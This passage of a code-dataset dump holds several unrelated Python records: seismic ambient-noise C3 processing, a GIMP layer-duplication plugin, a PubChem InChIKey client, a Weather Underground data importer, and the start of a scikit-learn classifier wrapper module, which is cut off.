:fparam.nfout2_2])) or np.any(np.isnan(fparam.arr2_2[3, :fparam.nfout2_2])):\n print ('!!! 
NaN detected: '+staid1+'_'+staid2)\n continue\n if np.where(fparam.arr2_2[8, :fparam.nfout2_2] > self.snr_thresh)[0].size < self.nfmin:\n continue\n if np.any(fparam.arr2_2[3, :fparam.nfout2_2] < 0.):\n continue\n Naftan += 1\n raw_pers.append(fparam.arr2_2[1, :fparam.nfout2_2])\n raw_grvel.append(fparam.arr2_2[2, :fparam.nfout2_2])\n raw_phvel.append(fparam.arr2_2[3, :fparam.nfout2_2])\n raw_snr.append(fparam.arr2_2[8, :fparam.nfout2_2])\n distances.append(outarr[0] + outarr[1])\n # get min/max periods\n if fparam.arr2_2[1, 0] < Tmin and fparam.arr2_2[8, 0] > self.snr_thresh:\n Tmin = fparam.arr2_2[1, 0]\n if fparam.arr2_2[1, fparam.nfout2_2 - 1] > Tmax and fparam.arr2_2[8, fparam.nfout2_2 - 1] > self.snr_thresh:\n Tmax = fparam.arr2_2[1, fparam.nfout2_2 - 1]\n if Naftan < self.Ntrace_min:\n return \n #=======================================\n # 1st iteration statistical analysis\n #=======================================\n pers = self.pers\n pers = pers[(pers >= Tmin)*(pers <= Tmax)]\n phvelarr = np.zeros((Naftan, pers.size))\n snrarr = np.zeros((Naftan, pers.size))\n indarr = np.zeros((Naftan, pers.size), dtype = bool)\n for i in range(Naftan):\n phvel_spl = scipy.interpolate.CubicSpline(raw_pers[i], raw_phvel[i])\n snr_spl = scipy.interpolate.CubicSpline(raw_pers[i], raw_snr[i])\n phvelarr[i, :] = phvel_spl(pers)\n snrarr[i, :] = snr_spl(pers)\n indarr[i, :] = (pers <= raw_pers[i][-1])*(pers >= raw_pers[i][0])*(snrarr[i, :] >=self.snr_thresh)\n Nm = indarr.sum(axis = 0)\n if np.any(Nm == 0):\n # # # print ('!!! GAP detected, 1st iteration : '+staid1+'_'+staid2)\n ist, ibe = _get_pers_ind(Nm)\n pers = pers[ist:ibe+1]\n phvelarr = phvelarr[:,ist:ibe+1]\n snrarr = snrarr[:,ist:ibe+1]\n indarr = indarr[:,ist:ibe+1]\n Nm = indarr.sum(axis = 0)\n if np.any(Nm == 0): # debug\n raise ValueError('CHECK number of measure: '+staid1+'_'+staid2)\n tmpphvel = (phvelarr*indarr).sum(axis = 0)\n meanvel = tmpphvel/Nm\n unarr = np.sum( indarr*(phvelarr - meanvel)**2, axis = 0)\n unarr = unarr/Nm/Nm\n unarr = np.sqrt(unarr)\n # throw out outliers\n indout = abs(phvelarr - meanvel) > 3*unarr\n indarr[indout] = False\n Nm = indarr.sum(axis = 0)\n if np.any(Nm == 0): # debug\n raise ValueError('CHECK number of measure: '+staid1+'_'+staid2)\n tmpphvel = (phvelarr*indarr).sum(axis = 0)\n meanvel = tmpphvel/Nm\n mean_phvel_spl = scipy.interpolate.CubicSpline(pers, meanvel)\n #====================\n # correct cycle skip\n #====================\n for i in range(Naftan):\n tmppers = raw_pers[i]\n tmpC = raw_phvel[i]\n tmpU = raw_grvel[i]\n meanC = mean_phvel_spl(tmppers[-1])\n omega = 2.*np.pi/tmppers\n phase = omega*(distances[i]/tmpU - distances[i]/tmpC)\n if tmpC[-1] > meanC:\n phase -= 2.*np.pi\n else:\n phase += 2.*np.pi\n tmpC_new = omega*distances[i]/(omega*distances[i]/tmpU - phase)\n meanCs = mean_phvel_spl(tmppers)\n del_C1 = np.sqrt( np.sum((tmpC-meanCs)**2/tmpC.size) )\n del_C2 = np.sqrt( np.sum((tmpC_new-meanCs)**2/tmpC.size) )\n if del_C1 > del_C2:\n raw_phvel[i][:] = tmpC_new\n #=======================================\n # 2nd iteration statistical analysis\n #======================================= \n phvelarr = np.zeros((Naftan, pers.size))\n indarr = np.zeros((Naftan, pers.size), dtype = bool)\n for i in range(Naftan):\n phvel_spl = scipy.interpolate.CubicSpline(raw_pers[i], raw_phvel[i])\n tmpphvel = phvel_spl(pers)\n phvelarr[i, :] = tmpphvel\n indarr[i, :] = (pers <= raw_pers[i][-1])*(pers >= raw_pers[i][0])*(snrarr[i, :] >=self.snr_thresh)*\\\n (tmpphvel >= self.vmin)*(tmpphvel <= 
self.vmax)\n Nm = indarr.sum(axis = 0)\n if np.any(Nm == 0):\n # # # print ('!!! GAP detected 2nd iteration : '+staid1+'_'+staid2)\n ist, ibe = _get_pers_ind(Nm)\n pers = pers[ist:ibe+1]\n phvelarr = phvelarr[:,ist:ibe+1]\n snrarr = snrarr[:,ist:ibe+1]\n indarr = indarr[:,ist:ibe+1]\n Nm = indarr.sum(axis = 0)\n if np.any(Nm == 0): # debug\n raise ValueError('CHECK number of measure: '+staid1+'_'+staid2)\n tmpphvel = (phvelarr*indarr).sum(axis = 0)\n meanvel = tmpphvel/Nm\n unarr = np.sum( indarr*(phvelarr-meanvel)**2, axis = 0)\n unarr = unarr/Nm/Nm\n unarr = np.sqrt(unarr)\n # outliers\n indout = abs(phvelarr - meanvel) > 2*unarr\n indarr[indout] = False\n # discard the whole dispersion curve if not enough points kept\n Npoint = indarr.sum(axis = 1)\n indout2 = Npoint < self.nfmin\n indout2 = np.tile(indout2, (pers.size, 1))\n indout2 = indout2.T\n indarr[indout2] = False\n # detect gaps and keep the longest no-gap periods\n Nm = indarr.sum(axis = 0)\n if np.any(Nm == 0):\n # # # print ('!!! GAP detected 2nd iteration : '+staid1+'_'+staid2)\n ist, ibe = _get_pers_ind(Nm)\n pers = pers[ist:ibe+1]\n phvelarr = phvelarr[:,ist:ibe+1]\n snrarr = snrarr[:,ist:ibe+1]\n indarr = indarr[:,ist:ibe+1]\n Nm = indarr.sum(axis = 0)\n if np.any(Nm == 0): # debug\n raise ValueError('CHECK number of measure: '+staid1+'_'+staid2)\n # final stacked results \n tmpphvel = (phvelarr*indarr).sum(axis = 0)\n mean_phvel = tmpphvel/Nm\n unarr = np.sum( indarr*(phvelarr - mean_phvel)**2, axis = 0)\n unarr = unarr/Nm/Nm\n unarr = np.sqrt(unarr)\n ftrig, trig, ierr, ist, ibe = _trigger(mean_phvel.size, np.float32(mean_phvel),\\\n np.float32(2*np.pi/pers), np.float32(self.jump_thresh) )\n index = np.zeros(pers.size, dtype = bool)\n if ierr != 0:\n index[ist:ibe] = True\n # save results\n outdir = self.outdir + '/DW_DISP/'+staid1\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n except OSError:\n i = 0\n while(i < 10):\n sleep_time = np.random.random()/10.\n time.sleep(sleep_time)\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n break\n except OSError:\n pass\n i += 1\n outfname = outdir + '/DISP_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'.npz'\n np.savez( outfname, pers, mean_phvel, unarr, snrarr, Nm, index)\n # save log files\n logfname = self.datadir + '/logs_dw_stack_disp/'+ staid1 + '/' + staid1 +'_'+staid2+'.log'\n if not os.path.isdir(self.datadir + '/logs_dw_stack_disp/'+ staid1):\n try:\n os.makedirs(self.datadir + '/logs_dw_stack_disp/'+ staid1)\n except OSError:\n i = 0\n while(i < 10):\n sleep_time = np.random.random()/10.\n time.sleep(sleep_time)\n if not os.path.isdir(self.datadir + '/logs_dw_stack_disp/'+ staid1):\n try:\n os.makedirs(self.datadir + '/logs_dw_stack_disp/'+ staid1)\n break\n except OSError:\n pass\n i += 1\n with open(logfname, 'w') as fid:\n fid.writelines('SUCCESS\\n')\n return \n \n def direct_wave_phase_shift_stack(self, process_id= '', verbose = False):\n \"\"\"direct wave three station interferogram phase shift stack\n \"\"\"\n if verbose:\n self.print_info(process_id = process_id)\n chan1 = self.channel[0]\n chan2 = self.channel[1]\n staid1 = self.netcode1 + '.' + self.stacode1\n staid2 = self.netcode2 + '.' 
+ self.stacode2\n        if len(glob.glob(self.datadir + '/SYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*.SAC')) > 0:\n            is_sync = True\n        elif len(glob.glob(self.datadir + '/ASYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*.SAC')) > 0:\n            is_sync = False\n        else:\n            return \n        dist0, az0, baz0= obspy.geodetics.gps2dist_azimuth(self.stla1, self.stlo1, self.stla2, self.stlo2)\n        dist0 /= 1000.\n        if is_sync:\n            saclst = glob.glob(self.datadir + '/SYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*.SAC')\n        else:\n            saclst = glob.glob(self.datadir + '/ASYNC_C3/'+staid1+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'_*.SAC')\n        #==============================\n        # reference dispersion curve\n        #==============================\n        if len(self.phvel_ref) == 0 or self.prefer_c3_disp:\n            dispfname = self.datadir + '/DW_DISP/'+staid1 + '/DISP_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'.npz'\n            if (not os.path.isfile(dispfname)) and len(self.phvel_ref) == 0:\n                return \n            inarr = np.load(dispfname)\n            pers = inarr['arr_0']\n            phvel = inarr['arr_1']\n            snr = inarr['arr_3']\n            if np.any(np.isnan(phvel)) or np.any(np.isnan(pers)) or np.any(np.isnan(snr)):\n                pers = self.pers_ref\n                phvel = self.phvel_ref\n                if len(self.phvel_ref) == 0:\n                    print ('!!! NaN detected: '+staid1+'_'+staid2)\n                    return\n        else: \n            pers = self.pers_ref\n            phvel = self.phvel_ref\n        # bound check\n        if np.any(phvel < self.vmin) or np.any(phvel > self.vmax):\n            pers = self.pers_ref\n            phvel = self.phvel_ref\n            if len(self.phvel_ref) == 0:\n                print ('!!! phase velocity out of bound: '+staid1+'_'+staid2)\n                return\n            if np.any(phvel < self.vmin) or np.any(phvel > self.vmax):\n                print ('!!! phase velocity out of bound: '+staid1+'_'+staid2)\n                return\n        # length check\n        if len(phvel) == 0:\n            pers = self.pers_ref\n            phvel = self.phvel_ref\n            if len(self.phvel_ref) == 0:\n                print ('!!! no reference phase velocity: '+staid1+'_'+staid2)\n                return\n        init_trace = False\n        for sacfname in saclst:\n            tr = obspy.read(sacfname)[0]\n            dt = tr.stats.delta\n            d = tr.stats.sac.user0\n            dist = tr.stats.sac.user0 + tr.stats.sac.dist\n            # get symmetric component\n            if abs(tr.stats.sac.b+tr.stats.sac.e) < tr.stats.delta:\n                nhalf = int((tr.stats.npts-1)/2+1)\n                neg = tr.data[:nhalf]\n                pos = tr.data[nhalf-1:tr.stats.npts]\n                neg = neg[::-1]\n                tr.data = (pos+neg)/2 \n                tr.stats.starttime = tr.stats.starttime+tr.stats.sac.e\n                tr.stats.sac.b = 0.\n            else:\n                etime = tr.stats.endtime - (tr.stats.sac.e - tr.stats.sac.b)/2.\n                tr.trim(endtime = etime)\n            #=========\n            # get SNR\n            #=========\n            tarr = tr.times()  # trace time axis; a distinct local name keeps the time module usable later in this function\n            begT = tarr[0]\n            endT = tarr[-1]\n            data_envelope = obspy.signal.filter.envelope(tr.data)\n            minT = dist/self.vmax \n            maxT = dist/self.vmin \n            ind = (tarr >= minT)*(tarr <= maxT)\n            amp_max = data_envelope[ind].max()\n            # noise window\n            minT = maxT + self.Tmax + 500.\n            if( (endT - minT) < 1100. ):\n                maxT = endT - 10.\n            else:\n                minT = endT - 1100.\n                maxT = endT - 100.\n            ib = (int)((minT-begT)/dt)\n            ie = (int)((maxT-begT)/dt)+2\n            tempnoise = tr.data[ib:ie]\n            if ie-ib-1<= 0:\n                continue\n            noiserms = np.sqrt(( np.sum(tempnoise**2))/(ie-ib-1.)
)\n if noiserms == 0 or np.isnan(noiserms):\n continue\n if amp_max/noiserms < self.snr_thresh:\n # # # print (amp_max, noiserms, sacfname)\n continue\n rms = np.sqrt(( np.sum(tr.data**2))/(tr.data.size) )\n weight = 1./rms\n if 'ELL.SAC' in sacfname:\n iphase = np.pi/4\n elif 'HYP.SAC' in sacfname:\n iphase = -np.pi/4\n else:\n raise ValueError('Unexpected type of C3')\n # perform phase shift\n tr.data = _tshift_fft(tr.data, dt, pers, phvel, iphase, d)\n tr.data *= weight\n # debug\n # outfname = sacfname[:-4] + '_shift.sac'\n # tr.write(outfname, format='SAC')\n \n if not init_trace:\n stack_trace = tr.copy()\n stack_trace.stats.sac.user3 = 1\n init_trace = True\n continue\n else:\n stack_trace.data += tr.data\n stack_trace.stats.sac.user3 += 1\n if not init_trace:\n if verbose:\n print ('!!!NO C3 data for: '+ staid1+'_'+chan1+'_'+staid2+'_'+chan2)\n return\n # save data\n outdir = self.outdir + '/STACK_C3/'+staid1\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n except OSError:\n i = 0\n while(i < 10):\n sleep_time = np.random.random()/10.\n time.sleep(sleep_time)\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n break\n except OSError:\n pass\n i += 1\n outfname= outdir+'/C3_'+staid1+'_'+chan1+'_'+staid2+'_'+chan2+'.SAC'\n stack_trace.write(outfname, format='SAC')\n # save log files\n logfname = self.datadir + '/logs_dw_stack/'+ staid1 + '/' + staid1 +'_'+staid2+'.log'\n if not os.path.isdir(self.datadir + '/logs_dw_stack/'+ staid1):\n try:\n os.makedirs(self.datadir + '/logs_dw_stack/'+ staid1)\n except OSError:\n i = 0\n while(i < 10):\n sleep_time = np.random.random()/10.\n time.sleep(sleep_time)\n if not os.path.isdir(self.datadir + '/logs_dw_stack/'+ staid1):\n try:\n os.makedirs(self.datadir + '/logs_dw_stack/'+ staid1)\n break\n except OSError:\n pass\n i += 1\n with open(logfname, 'w') as fid:\n fid.writelines('SUCCESS\\n')\n return \n \ndef direct_wave_interfere_for_mp(in_c3_pair, verbose=False, verbose2=False):\n process_id = multiprocessing.current_process().pid\n in_c3_pair.direct_wave_interfere(verbose = verbose, verbose2 = verbose2, process_id = process_id)\n return\n\ndef direct_wave_aftan_for_mp(in_c3_pair, verbose=False, verbose2=False):\n process_id = multiprocessing.current_process().pid\n try:\n in_c3_pair.direct_wave_aftan(verbose = verbose, process_id = process_id)\n except:\n # write log files\n outdir = in_c3_pair.datadir + '/logs_dw_aftan/'+ in_c3_pair.netcode1 + '.' + in_c3_pair.stacode1\n logfname = outdir + '/' + in_c3_pair.netcode1 + '.' + in_c3_pair.stacode1 +\\\n '_'+in_c3_pair.netcode2 + '.' + in_c3_pair.stacode2+'.log'\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n except OSError:\n i = 0\n while(i < 10):\n sleep_time = np.random.random()/10.\n time.sleep(sleep_time)\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n break\n except OSError:\n pass\n i += 1\n with open(logfname, 'w') as fid:\n fid.writelines('FAILED\\n')\n return\n\ndef direct_wave_stack_disp_for_mp(in_c3_pair, verbose=False, verbose2=False):\n process_id = multiprocessing.current_process().pid\n try:\n in_c3_pair.direct_wave_stack_disp(verbose = verbose, process_id = process_id)\n except:\n # write log files\n outdir = in_c3_pair.datadir + '/logs_dw_stack_disp/'+ in_c3_pair.netcode1 + '.' + in_c3_pair.stacode1\n logfname = outdir + '/' + in_c3_pair.netcode1 + '.' + in_c3_pair.stacode1 +\\\n '_'+in_c3_pair.netcode2 + '.' 
+ in_c3_pair.stacode2+'.log'\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n except OSError:\n i = 0\n while(i < 10):\n sleep_time = np.random.random()/10.\n time.sleep(sleep_time)\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n break\n except OSError:\n pass\n i += 1\n with open(logfname, 'w') as fid:\n fid.writelines('FAILED\\n')\n return\n\ndef direct_wave_phase_shift_stack_for_mp(in_c3_pair, verbose=False, verbose2=False):\n process_id = multiprocessing.current_process().pid\n try:\n in_c3_pair.direct_wave_phase_shift_stack(verbose = verbose, process_id = process_id)\n except:\n # write log files\n outdir = in_c3_pair.datadir + '/logs_dw_stack/'+ in_c3_pair.netcode1 + '.' + in_c3_pair.stacode1\n logfname = outdir + '/' + in_c3_pair.netcode1 + '.' + in_c3_pair.stacode1 +\\\n '_'+in_c3_pair.netcode2 + '.' + in_c3_pair.stacode2+'.log'\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n except OSError:\n i = 0\n while(i < 10):\n sleep_time = np.random.random()/10.\n time.sleep(sleep_time)\n if not os.path.isdir(outdir):\n try:\n os.makedirs(outdir)\n break\n except OSError:\n pass\n i += 1\n with open(logfname, 'w') as fid:\n fid.writelines('FAILED\\n')\n return\n\n","sub_path":"noise/_c3_funcs.py","file_name":"_c3_funcs.py","file_ext":"py","file_size_in_byte":41306,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"283903816","text":"#!/usr/bin/env python2\n\nfrom gimpfu import *\n\nfrom itertools import cycle\n\ndef parse_pattern(pattern, offset, end):\n if end <= offset:\n return []\n if '1' not in pattern:\n return []\n out = []\n for n, x in enumerate(cycle(pattern), offset):\n if n > end or n > 10000: #failsafe\n break\n if x == '1':\n out.append(n)\n return out\n\n\ndef mass_duplicate_layers(image, layer, pattern, offset, defaultend, lastlayer):\n pdb = gimp.pdb\n if offset < 0 or offset >= len(image.layers):\n return\n if not defaultend and layer == lastlayer:\n return\n pdb.gimp_image_undo_group_start(image)\n # Copy the old layer so counting will be easier\n newlayer = layer.copy()\n newlayer.name = layer.name\n image.remove_layer(layer)\n if defaultend:\n end = len(image.layers)-1\n else:\n end = image.layers.index(lastlayer)\n patternlist = parse_pattern(pattern, offset, end)\n for i in patternlist[::-1][:-1]:\n l = newlayer.copy()\n image.add_layer(l, i)\n image.add_layer(newlayer, offset)\n pdb.gimp_image_undo_group_end(image)\n return\n\nregister(\n \"nycz_mass_duplicate_layers\",\n \"Mass duplicate layers\",\n \"Duplicate a layer and place it at specific intervals among the existing layers\",\n \"Nycz\",\n \"Nycz\",\n \"August 2015\",\n \"/Nycz/Mass duplicate layers...\",\n \"RGBA*\",\n [\n (PF_STRING, \"pattern\", \"Pattern (1 shows, 0 hides):\", \"1\"),\n (PF_INT, \"offset\", \"Offset to use:\", 0),\n (PF_TOGGLE, \"defaultend\", \"Ignore end point:\", 1),\n (PF_LAYER, \"lastlayer\", \"Last layer to use:\", None),\n ],\n [],\n mass_duplicate_layers,\n )\n\nmain()\n","sub_path":"NyczMassDuplicateLayers.py","file_name":"NyczMassDuplicateLayers.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"651318147","text":"import logging\nimport requests\nfrom functools import lru_cache\n\n\npubchem_url = 'https://pubchem.ncbi.nlm.nih.gov/rest/pug'\n\n\nlogger = logging.getLogger(__name__)\n\n\n@lru_cache(maxsize=5000)\ndef get_inchi_key(pubchem_cid):\n \"\"\"Return the InChIKey for a given 
PubChem CID.\n\n    Parameters\n    ----------\n    pubchem_cid : str\n        The PubChem CID whose InChIKey should be returned.\n\n    Returns\n    -------\n    str\n        The InChIKey corresponding to the PubChem CID.\n    \"\"\"\n    url = '%s/compound/cid/%s/property/InChIKey/TXT' % \\\n        (pubchem_url, pubchem_cid)\n    res = requests.get(url)\n    if res.status_code != 200:\n        logger.error('Could not retrieve InChIKey for %s' % pubchem_cid)\n        return None\n    return res.text.strip()\n","sub_path":"indra/databases/pubchem_client.py","file_name":"pubchem_client.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"650281168","text":"#!/usr/bin/env python3\n\nimport datetime\nimport argparse\nimport requests\nimport csv\nimport dateutil.parser\n\nimport mezuri\nDB_IP = '146.148.49.96'\n\n# Raw format from wunderground:\n# ['TimeEDT', 'TemperatureF', 'Dew PointF', 'Humidity', 'Sea Level PressureIn',\n# 'VisibilityMPH', 'Wind Direction', 'Wind SpeedMPH', 'Gust SpeedMPH',\n# 'PrecipitationIn', 'Events', 'Conditions', 'WindDirDegrees', 'DateUTC<br />
']\n#\n# Sample row:\n# ['12:53 AM', '69.1', '62.1', '78', '30.01', '10.0', 'Calm', 'Calm', '-',\n# 'N/A', '', 'Clear', '0', '2014-08-30 04:53:00<br />']\n#\n# 'TimeEDT'\t\t\t\t'12:53 AM'\n# 'TemperatureF'\t\t'69.1'\n# 'Dew PointF'\t\t\t'62.1'\n# 'Humidity'\t\t\t'78'\n# 'Sea Level PressureIn',\t '30.01'\n# 'VisibilityMPH'\t\t'10.0'\n# 'Wind Direction'\t\t'Calm'\n# 'Wind SpeedMPH'\t\t'Calm'\n# 'Gust SpeedMPH',\t\t'-'\n# 'PrecipitationIn'\t\t'N/A'\n# 'Events'\t\t\t\t''\n# 'Conditions'\t\t\t'Clear'\n# 'WindDirDegrees'\t\t'0'\n# 'DateUTC<br />'\t\t'2014-08-30 04:53:00<br />']\n\ndef create_table(mt, airport, year, month, day):\n\tprint('Creating table wunderground-{}-{}-{:02d}-{:02d}'.format(airport, year, month, day))\n\tschema = {'timestamp': mezuri.ColumnTypes.datetime,\n\t\t\t 'tempF': mezuri.ColumnTypes.number,\n\t\t\t 'humidity': mezuri.ColumnTypes.number,\n\t\t\t }\n\tmt.create('wunderground-{}-{}-{:02d}-{:02d}'.format(airport, year, month, day), schema)\n\ndef strip_html(iterable):\n\tfor l in iterable:\n\t\tif len(l) == 0:\n\t\t\tcontinue\n\t\tl = l.decode('utf-8')\n\t\tl = l.replace('<br />
', '')\n\t\tyield l\n\ndef add_data(mt, airport, year, month, day):\n\tprint(\"Fetching data from wunderground...\")\n\tURL = 'http://www.wunderground.com/history/airport/{}/{}/{}/{}/DailyHistory.html?format=1'.format(\n\t\t\tairport, year, month, day)\n\tr = requests.get(URL)\n\tc = csv.reader(strip_html(r.iter_lines()))\n\tcheck_names = False\n\tdata = []\n\tfor row in c:\n\t\tif not check_names:\n\t\t\t#if row[0] != 'TimeEDT':\n\t\t\t#\tprint(\"WARN: Skipping {}-{}-{}-{}. Expected row[0] is 'TimeEDT', but was {}\".format(\n\t\t\t#\t\tairport, year, month, day, row[0]))\n\t\t\t#\tbreak\n\t\t\tif row[1] != 'TemperatureF':\n\t\t\t\tprint(\"WARN: Skipping {}-{}-{}-{}. Expected row[1] is 'TemperatureF', but was >>{}<<\".format(\n\t\t\t\t\tairport, year, month, day, row[1]))\n\t\t\t\tbreak\n\t\t\tif row[3] != 'Humidity':\n\t\t\t\tprint(\"WARN: Skipping {}-{}-{}-{}. Expected row[3] is 'Humidity', but was >>{}<<\".format(\n\t\t\t\t\tairport, year, month, day, row[3]))\n\t\t\t\tbreak\n\t\t\tif row[13] != 'DateUTC':\n\t\t\t\tprint(\"WARN: Skipping {}-{}-{}-{}. Expected row[13] is 'DateUTC', but was >>{}<<\".format(\n\t\t\t\t\tairport, year, month, day, row[13]))\n\t\t\t\tbreak\n\t\t\tcheck_names = True\n\t\t\tcontinue\n\t\tdata.append({\n\t\t\t'timestamp': dateutil.parser.parse(row[13]+'Z'),\n\t\t\t'tempF': float(row[1]),\n\t\t\t'humidity': float(row[3])\n\t\t\t})\n\n\tprint('Adding data...')\n\tmt.add_rows(data)\n\ndef get_data(mt, airport, year, month, day):\n\tprint('Get the data back...')\n\trows = mt.get_rows(100)\n\tfor i,row in enumerate(rows):\n\t\tprint('row {}'.format(i))\n\t\tfor k,v in row.items():\n\t\t\tprint(' {:<10}: {}'.format(k,v))\n\nif __name__ == '__main__':\n\tparser = argparse.ArgumentParser(description=\"Weather Underground Import Script\")\n\tparser.add_argument('--ip', type=str, default=DB_IP)\n\tparser.add_argument('--airport', type=str, default='KARB') # Ann Arbor\n\tparser.add_argument('--year', type=int, default=2013)\n\tparser.add_argument('--month', type=int, default=8)\n\tparser.add_argument('--day', type=int, default=30)\n\n\targs = parser.parse_args()\n\n\tprint('Making a connection to Mezuri...')\n\tmt = mezuri.MezuriTable('http://'+args.ip+'/odktables', 'mezuri-10100233')\n\n\tcreate_table(mt, args.airport, args.year, args.month, args.day)\n\tadd_data(mt, args.airport, args.year, args.month, args.day)\n\t#get_data(mt, args.airport, args.year, args.month, args.day)\n","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":3678,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"179772993","text":"import numpy as np\nfrom scipy.sparse import csr_matrix\nimport theanets as tn\nfrom sklearn.tree import DecisionTreeClassifier\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.svm import SVC\nfrom sklearn.ensemble import RandomForestClassifier, \\\n BaggingClassifier, AdaBoostClassifier, GradientBoostingClassifier\ntry:\n import tensorflow.contrib.learn as skflow\nexcept ImportError:\n print('Tensorflow not installed')\n\nfrom operator import itemgetter\nfrom scipy.stats import randint as sp_randint\nfrom numpy import random\n\nfrom sklearn.grid_search import RandomizedSearchCV\n\n\nclass DMCClassifier:\n clf = None\n\n def __init__(self, X: csr_matrix, Y: np.array, tune_parameters=False):\n assert len(Y) == X.shape[0]\n self.X = X\n self.Y = Y\n self.tune_parameters = tune_parameters\n\n def __call__(self, X: csr_matrix) -> np.array:\n if self.tune_parameters:\n 
print(self.clf.get_params().keys())\n try:\n self.estimate_parameters_with_random_search()\n except Exception as e:\n print(e)\n pass\n self.fit()\n return self.predict(X)\n\n def report(self, grid_scores, n_top=3):\n top_scores = sorted(\n grid_scores, key=itemgetter(1), reverse=True)[:n_top]\n for i, score in enumerate(top_scores):\n print(\"Model with rank: {0}\".format(i + 1))\n print(\"Mean validation score: {0:.3f} (std: {1:.3f})\".format(\n score.mean_validation_score, np.std(score.cv_validation_scores)))\n print(\"Parameters: {0}\".format(score.parameters))\n print(\"\")\n\n def estimate_parameters_with_random_search(self):\n random_search = RandomizedSearchCV(self.clf, param_distributions=self.param_dist_random,\n n_iter=30)\n random_search.fit(self.X, self.Y)\n print(\"Random Search\")\n self.report(random_search.grid_scores_)\n\n def fit(self):\n self.clf.fit(self.X, self.Y)\n return self\n\n def predict(self, X: csr_matrix) -> np.array:\n return self.clf.predict(X)\n\n def predict_proba(self, X: csr_matrix) -> np.array:\n return self.clf.predict_proba(X)\n\n\nclass DecisionTree(DMCClassifier):\n def __init__(self, X: csr_matrix, Y: np.array, tune_parameters=False):\n super().__init__(X, Y, tune_parameters)\n if tune_parameters:\n self.param_dist_random = {'max_depth': sp_randint(1, 100),\n 'min_samples_leaf': sp_randint(1, 150),\n 'max_features': sp_randint(1, self.X.shape[1] - 1),\n 'criterion': ['entropy', 'gini']}\n self.clf = DecisionTreeClassifier()\n\n\nclass Forest(DMCClassifier):\n def __init__(self, X: csr_matrix, Y: np.array, tune_parameters=False):\n super().__init__(X, Y, tune_parameters)\n if tune_parameters:\n self.param_dist_random = {'max_depth': sp_randint(1, 100),\n 'min_samples_leaf': sp_randint(1, 100),\n 'max_features': sp_randint(1, self.X.shape[1] - 1),\n 'criterion': ['entropy', 'gini']}\n self.clf = RandomForestClassifier(n_estimators=100, n_jobs=8)\n\n\nclass NaiveBayes(DMCClassifier):\n clf = BernoulliNB(binarize=True)\n\n\nclass SVM(DMCClassifier):\n def __init__(self, X: csr_matrix, Y: np.array, tune_parameters=False):\n super().__init__(X, Y, tune_parameters)\n if tune_parameters:\n self.param_dist_random = {'shrinking': [True, False],\n 'kernel': ['linear', 'poly', 'rbf', 'sigmoid'],\n 'degree': sp_randint(2, 5)}\n self.clf = SVC(kernel='rbf', shrinking=True)\n\n def predict_proba(self, X: csr_matrix) -> np.array:\n return self.clf.decision_function(X)\n\n\nclass TheanoNeuralNetwork(DMCClassifier):\n def __init__(self, X: csr_matrix, Y: np.array, tune_parameters=False):\n super().__init__(X, Y, tune_parameters=False)\n input_layer, output_layer = self.X.shape[1], len(np.unique(Y))\n inp = tn.layers.base.Input(size=input_layer, sparse='csr')\n self.clf = tn.Classifier(layers=[inp,\n (100, 'linear'), (50, 'norm:mean+relu'),\n output_layer])\n\n def fit(self):\n self.clf.train((self.X, self.Y), algo='sgd', learning_rate=.05, momentum=0.9)\n return self\n\n\nclass BagEnsemble(DMCClassifier):\n classifier = None\n estimators = 20\n max_features = .5\n max_samples = .5\n\n def __init__(self, X: csr_matrix, Y: np.array, tune_parameters=False):\n super().__init__(X, Y, tune_parameters)\n if tune_parameters:\n self.param_dist_random = {'max_features': sp_randint(1, self.X.shape[1]),\n 'n_estimators': sp_randint(1, 100)}\n self.clf = BaggingClassifier(self.classifier, n_estimators=self.estimators, n_jobs=8,\n max_samples=self.max_samples, max_features=self.max_features)\n\n\nclass TreeBag(BagEnsemble):\n classifier = DecisionTreeClassifier()\n\n\nclass 
SVMBag(DMCClassifier):\n classifier = None\n estimators = 10\n max_features = .5\n max_samples = .5\n\n def __init__(self, X: csr_matrix, Y: np.array, tune_parameters=False):\n super().__init__(X, Y, tune_parameters)\n self.X, self.Y = X.toarray(), Y\n self.classifier = SVC(decision_function_shape='ovo')\n self.clf = BaggingClassifier(self.classifier, n_estimators=self.estimators, n_jobs=8,\n max_samples=self.max_samples, max_features=self.max_features)\n\n def predict(self, X: csr_matrix):\n X = X.toarray()\n return self.clf.predict(X)\n\n\nclass AdaBoostEnsemble(DMCClassifier):\n classifier = None\n estimators = 800\n learning_rate = .25\n algorithm = 'SAMME.R'\n\n def __init__(self, X: np.array, Y: np.array, tune_parameters=False):\n super().__init__(X, Y, tune_parameters)\n if tune_parameters:\n self.param_dist_random = {'n_estimators': sp_randint(1, 1000),\n 'algorithm': ['SAMME', 'SAMME.R'],\n 'learning_rate': random.random(100)}\n self.param_dist_grid = {'n_estimators': [100, 200, 400, 900, 1000],\n 'algorithm': ['SAMME', 'SAMME.R'],\n 'learning_rate': [.1, .2, 0.25, .3,\n .4, .5, .6]}\n self.clf = AdaBoostClassifier(self.classifier,\n n_estimators=self.estimators,\n 